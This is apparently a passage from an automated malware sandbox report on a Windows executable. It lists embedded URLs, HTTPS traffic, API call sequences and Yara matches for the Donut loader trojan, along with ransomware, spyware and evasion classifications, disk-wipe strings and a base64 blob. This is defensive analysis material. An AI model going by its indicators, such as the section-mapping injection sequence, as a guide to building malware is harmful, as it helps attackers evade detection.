                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://stats.adlice.comROGUEKILLER_TECHUCHECK_TECHDIAG_TECHDIFFVIEW
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://status.adlice.com/api.php?action=config&token=FxdaJ5JabbPwT7aSWhXgenforcesilentcommunitysend
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://status.adlice.com/api.php?action=ping&token=FxdaJ5JabbPwT7aSWhXg
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://www.carifred.com/uvk/cloudsync.php?u=Mozilla/5.0
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://www.carifred.com/uvk/cloudsyncput.php?u=fred(go);Content-Type:
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://www.carifred.com/uvk/md5_vreports/index.php?md5=https://www.google.comMozilla/5.0
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://www.google.com/search
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://www.google.com/search?q=
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://www.virustotal.com...
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://www.virustotal.com/
                    Source: WyPb2uVZ1P.exeString found in binary or memory: https://www.virustotal.com/gui/file/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49799 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49805 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49812 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49820 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49825 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49907 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49915 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49926 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49939 version: TLS 1.2
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AA9320 #413,GetUpdateRect,#413,BeginPaint,GetWindowDC,#413,GetWindowRect,CreateCompatibleDC,#413,CreateCompatibleBitmap,SelectObject,GetBkColor,CreateSolidBrush,FillRect,GetSysColorBrush,FillRect,FillRect,SendMessageW,BitBlt,SelectObject,DeleteDC,DeleteObject,ReleaseDC,EndPaint,#413,0_2_00AA9320

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Found string related to ransomware
                    Source: WyPb2uVZ1P.exeBinary or memory string: valuedb_version[YaraScanner::LoadVersionInformation] Found signatures version (%ls)[YaraScanner::LoadSignaturesPackage] Loading signatures package (%ls)...YaraScanner::LoadSignaturesPackage: Invalid archive (%ls)YaraScanner::LoadSignaturesPackage: Unable to unzip dataYaraScanner::LoadSignaturesPackage: Invalid data (%ls)[YaraScanner::LoadSignaturesPackage] Extracted signatures to (%ls)[YaraScanner::LoadPortableSignatures] Loading portable signatures package (%ls)...[YaraScanner::LoadPortableSignatures] Unable to open portable package (%ls)...[YaraScanner::LoadPortableSignatures] Unable to load portable signatures package (%ls)...%s/api.php?action=checkpackageversion&token=%s&version=%s&yara_version=%s&beta=true&client=&client_version=[YaraScanner::CheckForUpdates] Server returned empty response[YaraScanner::CheckForUpdates] Server returned bad data[YaraScanner::CheckForUpdates] Signatures outdated (%ls => %ls).[YaraScanner::LoadRemoteSignatures] Loading remote signatures, download_new=%d...scanner_signatures_update_allowedYaraScanner::LoadRemoteSignatures: Downloading %ls...%s/api.php?action=downloadpublication&token=%s&version=%s&encrypted=true&yara_version=%s[YaraScanner::LoadRemoteSignatures] Error while downloading from %ls[YaraScanner::LoadRemoteSignatures] Signatures updated (%ls => %ls).[YaraScanner::LoadExistingSignatures] Loading local signatures...YaraScanner::LoadExistingSignatures: Unable to load version data[YaraScanner::LoadExistingSignatures] Engine not ready, discarding...YaraScanner::LoadExistingSignatures: Unable to lock the engine for updateaddonsYaraScanner::LoadAddonsipsYaraScanner::LoadIpsfilenamesYaraScanner::LoadFilenamesYaraScanner::LoadServicesYaraScanner::LoadWindownamesregnamesYaraScanner::LoadRegistrynamesguidYaraScanner::LoadGUIDsYaraScanner::LoadSignaturesYaraScanner::LoadHostsYaraScanner::LoadMBRSigsdomainsYaraScanner::LoadDomainspackersYaraScanner::LoadPackersYaraScanner::LoadTasksYaraScanner::LoadWmidigisigYaraScanner::LoadDigisigpdbYaraScanner::LoadPdbwebconfigYaraScanner::LoadWebConfig[YaraScanner::LoadExistingSignatures] Unable to load signatures (%lx)[YaraScanner::LoadBackupSignatures] Loading backup signatures...[YaraScanner::LoadBackupSignatures] Unable to find backup signatures version, discarding...[YaraScanner::LoadBackupSignatures] Engine is not ready, discarding...YaraScanner::Total[YaraScanner::LoadSignaturesFromResources] Filtered by engine flag, %lu[YaraScanner::LoadSignaturesFromResources] Unable to load signatures from resources, %lu[YaraScanner::LoadSignaturesFromFile] Filtered by engine flag, %ls[YaraScanner::LoadSignaturesFromFile] Unable to load signatures from file, %ls[YaraScanner::LoadSignaturesFromFile] Unable to load signatures from buffer, %lsthreat067158767e2655e9c5e298626d209619https://adflux.adlice.com
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A92A60 _memcpy_s,CryptImportKey,CryptSetKeyParam,0_2_00A92A60

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.WyPb2uVZ1P.exe.4ca1590.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0.2.WyPb2uVZ1P.exe.3102534.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0.2.WyPb2uVZ1P.exe.3102534.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000003.00000002.2573265083.0000000000610000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    .NET source code contains very large array initializations
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, Brotli.csLarge array initialization: Brotli: array initializer size 122784
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, Brotli.csLarge array initialization: Brotli: array initializer size 32768
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, Brotli.csLarge array initialization: Brotli: array initializer size 32768
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, Brotli.csLarge array initialization: Brotli: array initializer size 31705
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0066A454 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,NtUnmapViewOfSection,3_2_0066A454
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AC29F6: CreateFileW,DeviceIoControl,0_2_00AC29F6
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AC6020 SetThreadExecutionState,SetWindowTextW,LoadCursorW,SetClassLongW,__aulldiv,__aulldiv,PlaySoundW,ExitWindowsEx,__aulldiv,Sleep,0_2_00AC6020
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AC6B37 __aulldiv,ExitWindowsEx,0_2_00AC6B37
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00B11B350_2_00B11B35
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AC60200_2_00AC6020
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AC21420_2_00AC2142
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00B11AF00_2_00B11AF0
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00B132500_2_00B13250
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00B11B050_2_00B11B05
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00B07B640_2_00B07B64
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00B11C800_2_00B11C80
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00B13DF40_2_00B13DF4
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00ACBE900_2_00ACBE90
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AA16D00_2_00AA16D0
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00B11FED0_2_00B11FED
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_030EEC480_2_030EEC48
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_031000000_2_03100000
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_0339BB140_2_0339BB14
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_0339E36C0_2_0339E36C
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_033999780_2_03399978
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_0339B0740_2_0339B074
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_0339A86C0_2_0339A86C
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_0339AC3C0_2_0339AC3C
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_0739FAB00_2_0739FAB0
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_0739E7880_2_0739E788
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_0739E2180_2_0739E218
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_0738003B0_2_0738003B
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_073800400_2_07380040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0066A4543_2_0066A454
                    Source: WyPb2uVZ1P.exeStatic PE information: invalid certificate
                    Source: WyPb2uVZ1P.exeBinary or memory string: OriginalFilename vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000003.2169346203.0000000006620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSaskohvekd.dll" vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSaskohvekd.dll" vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2370757567.0000000006CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2368590089.0000000006380000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIvauw.exe, vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000000.2031285974.0000000000B68000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRebootExec.exeF vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2351025665.0000000000B21000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameInternalNameFileDescription vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIvauw.exe, vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2368851538.0000000006620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSaskohvekd.dll" vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004C28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exeBinary or memory string: OriginalFileNameInternalNameFileDescription vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exeBinary or memory string: OriginalFilenameRebootExec.exeF vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exeBinary or memory string: OriginalFilenameUpdater0 vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.WyPb2uVZ1P.exe.4ca1590.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0.2.WyPb2uVZ1P.exe.3102534.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0.2.WyPb2uVZ1P.exe.3102534.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000003.00000002.2573265083.0000000000610000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, -.csBase64 encoded string: 'HFhUK0ieYXNCOUGWLFVOMEPdDlJUOkCRI1gcGEiHCk9TLVSyPFJCMk+fNhpAOlmsCVRLM2OSIkQcMF2sBk9CLliSI0hTJhaUKlV4E0idKFVPZGqWO3VeL0i1PU5KF0ydK01CZEqWO35pPkCWdGhJO0iLAEccDUiSK3JTLUSdKBpmO0nIKERTAH2cPEhTNkKddEZCK3KwOlNVOkOHC05KPkSddHJCK2mSO0AcbhrDdxkcHl6AKkxFM1SgKlNROl/IHEhKL0GWDlJUOkCRI1hiJ12fIFNCLRaRLkNCM1uedFJKMEaWO0RUKw=='
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: WyPb2uVZ1P.exeBinary string: AsyncCreateFileKBMBGBTBPBbytes%I64d %s%.2llf %sdskwipe%lu\\.\%sExtendedUnformatted%ls (0x%02X)FAT12FAT16DELL (spanning)Config/diagnosticsHidden FATHidden NTFSPMagic recoveryHidden NetWareLinux/MINIXSFS/LDM/Linux SwapNovellEZ-DriveOS/2 BMXenixUNIXScramdiskXOSL FSMINIXLinux SwapLinuxHidden LinuxNTFS volume setBSD/OSHibernationBSDMac OS-XNetBSDMac OS-X BootBSDI BSD/386 swapHidden Linux swapVMwareVMware swapLinux RAIDWinNT hidden0x%02XBasic DataUnusedSystemMSFT ReservedLDM MetadataLDM DataMSFT Recovery%c:\\.\%c:\DosDevices\%c:ABCDEFGHIJKLMNOPQRSTUVwXYZ\Device\Harddisk%d\Partition%dError: %ld
                    Source: WyPb2uVZ1P.exeBinary string: \\.\PhysicalDrive%d\Device\Floppy%d\Device\CdRom%d\Device\Ramdisk\Device\countrydnsapi.dllDnsFlushResolverCacheProcessIdToSessionIdSeTcbPrivilegewinlogon.exe\c3
                    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@4/0@2/2
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AA09D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_00AA09D0
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AA7620 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_00AA7620
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A922C0 CoCreateInstance,PathFileExistsW,0_2_00A922C0
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AB9E60 FindResourceW,SizeofResource,LoadResource,LockResource,0_2_00AB9E60
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_03
                    Source: WyPb2uVZ1P.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: WyPb2uVZ1P.exeReversingLabs: Detection: 56%
                    Source: WyPb2uVZ1P.exeVirustotal: Detection: 45%
                    Source: WyPb2uVZ1P.exeString found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
                    Source: WyPb2uVZ1P.exeString found in binary or memory: 66MHz CapableSlot type: AGPSlot type: AGP 2XSlot type: AGP 4XSlot type: PCI-XSlot type: AGP 8XSlot type: M.2 Socket 1-DP (Mechanical Key A)Slot type: M.2 Socket 1 - SD(Mechanical Key E)Slot type: M.2 Socket 2 (Mechanical Key B)Slot type: M.2 Socket 3 (Mechanical Key M)Slot type: MXM Type ISlot type: MXM Type IISlot type: MXM Type III (standard connector)Slot type: MXM Type III (HE connector)Slot type: MXM Type IVSlot type: MXM 3.0 Type ASlot type: MXM 3.0 Type BSlot type: PCI Express Gen 2 SFF - 8639Slot type: PCI Express Gen 3 SFF - 8639Slot type: PCI Express Mini 52 - pin (CEM spec. 2.0) with bottom-side keep-outsSlot type: PCI Express Mini 52-pin (CEM spec. 2.0) without bottom-side keep-outsSlot type: PCI Express Mini 76 - pin (CEM spec. 2.0). Corresponds to Display - Mini cardSlot type: PC-98/C20Slot type: PC-98/C24Slot type: PC-98/ESlot type: PC-98/Local BusSlot type: PC-98/CardSlot type: PCI ExpressSlot type: PCI Express x1Slot type: PCI Express x2Slot type: PCI Express x4Slot type: PCI Express x8Slot type: PCI Express x16Slot type: PCI Express Gen 2Slot type: PCI Express Gen 2 x1Slot type: PCI Express Gen 2 x2Slot type: PCI Express Gen 2 x4Slot type: PCI Express Gen 2 x8Slot type: PCI Express Gen 2 x16Slot type: PCI Express Gen 3Slot type: PCI Express Gen 3 x1Slot type: PCI Express Gen 3 x2Slot type: PCI Express Gen 3 x4Slot type: PCI Express Gen 3 x8Slot type: PCI Express Gen 3 x16Slot type: UnknownIn Use: YES In Use: NO Name: AcerPackard bell0SNID: Dell0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-Service tag: EnumSystemFirmwareTablesKernel32.dllGetSystemFirmwareTableKernel32.dllSelect Vendor, Name, IdentifyingNumber from Win32_ComputerSystemProductROOT\CIMV2VendorTo be filled Name IdentifyingNumberSelect Manufacturer, Product, SerialNumber, Version from Win32_BaseBoardManufacturerTo be filled Product Version SerialNumberSelect SerialNumber from Win32_BIOSSerialNumberRoot\CIMV2Select * From Win32_PrinterCancelAllJobsReturnValue-ContinueRepair-DesktopWatermarkConfig/UpdateVT-DesktopWatermark-ImmunizeConfig/MRSAPP/apfHKLM\SOFTWARE\Carifred\UVK - Ultra virus killerRebootActionsReset_CHKDSK-RestoreBoot/StopResetApps-StopResetApps/UpdateFromZip/PostUpdateActions\UVKRebootExecLog.txtReset_UDS-ReplaceFile-SReplaceFile-SReplaceFile-ExpandFile-SExpandFile-SExpandFile\UVK_en.exe HKLM\SYSTEM\CurrentControlSet\Control\Session Managerautocheck autochk *BootExecute\cmd.exe /c chkntfs /x \boot.inioperating systems /safeboot:minimal /sos /bootlog /noguiboot /safeboot:network /sos /bootlog /noguibootoperating systems\bcdedit.exe /deletevalue {current} safeboot user...
                    Source: WyPb2uVZ1P.exeString found in binary or memory: 66MHz CapableSlot type: AGPSlot type: AGP 2XSlot type: AGP 4XSlot type: PCI-XSlot type: AGP 8XSlot type: M.2 Socket 1-DP (Mechanical Key A)Slot type: M.2 Socket 1 - SD(Mechanical Key E)Slot type: M.2 Socket 2 (Mechanical Key B)Slot type: M.2 Socket 3 (Mechanical Key M)Slot type: MXM Type ISlot type: MXM Type IISlot type: MXM Type III (standard connector)Slot type: MXM Type III (HE connector)Slot type: MXM Type IVSlot type: MXM 3.0 Type ASlot type: MXM 3.0 Type BSlot type: PCI Express Gen 2 SFF - 8639Slot type: PCI Express Gen 3 SFF - 8639Slot type: PCI Express Mini 52 - pin (CEM spec. 2.0) with bottom-side keep-outsSlot type: PCI Express Mini 52-pin (CEM spec. 2.0) without bottom-side keep-outsSlot type: PCI Express Mini 76 - pin (CEM spec. 2.0). Corresponds to Display - Mini cardSlot type: PC-98/C20Slot type: PC-98/C24Slot type: PC-98/ESlot type: PC-98/Local BusSlot type: PC-98/CardSlot type: PCI ExpressSlot type: PCI Express x1Slot type: PCI Express x2Slot type: PCI Express x4Slot type: PCI Express x8Slot type: PCI Express x16Slot type: PCI Express Gen 2Slot type: PCI Express Gen 2 x1Slot type: PCI Express Gen 2 x2Slot type: PCI Express Gen 2 x4Slot type: PCI Express Gen 2 x8Slot type: PCI 